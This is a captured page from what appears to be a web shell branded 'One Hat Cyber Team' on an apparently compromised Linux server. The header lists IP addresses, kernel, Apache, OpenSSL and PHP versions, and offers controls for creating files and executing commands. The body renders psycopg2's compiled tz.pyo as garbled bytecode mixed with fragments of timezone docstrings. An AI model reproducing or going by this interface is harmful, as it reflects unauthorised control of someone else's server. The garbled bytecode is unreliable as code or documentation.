⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib64
/
python2.7
/
site-packages
/
psycopg2
/
View File Name :
tz.pyo
� 0��Qc @ s� d Z d d l Z d d l Z e j d � Z d e j f d � � YZ e j d e j � Z e j r~ e j d e j � Z n e Z e e Z d e j f d � � YZ e � Z d S( s� tzinfo implementations for psycopg2 This module holds two different tzinfo implementations that can be used as the 'tzinfo' argument to datetime constructors, directly passed to psycopg functions or used to set the .tzinfo_factory attribute in cursors. i����Ni t FixedOffsetTimezonec B sk e Z d Z d Z e Z i Z d d d � Z d d d � Z d � Z d � Z d � Z d � Z d � Z RS( sG Fixed offset in minutes east from UTC. This is exactly the implementation__ found in Python 2.3.x documentation, with a small change to the `!__init__()` method to allow for pickling and a default name in the form ``sHH:MM`` (``s`` is the sign.). The implementation also caches instances. During creation, if a FixedOffsetTimezone instance has previously been created with the same offset and name that instance will be returned. This saves memory and improves comparability. .. __: http://docs.python.org/library/datetime.html#datetime-tzinfo c C s@ | d k r$ t j d | � | _ n | d k r<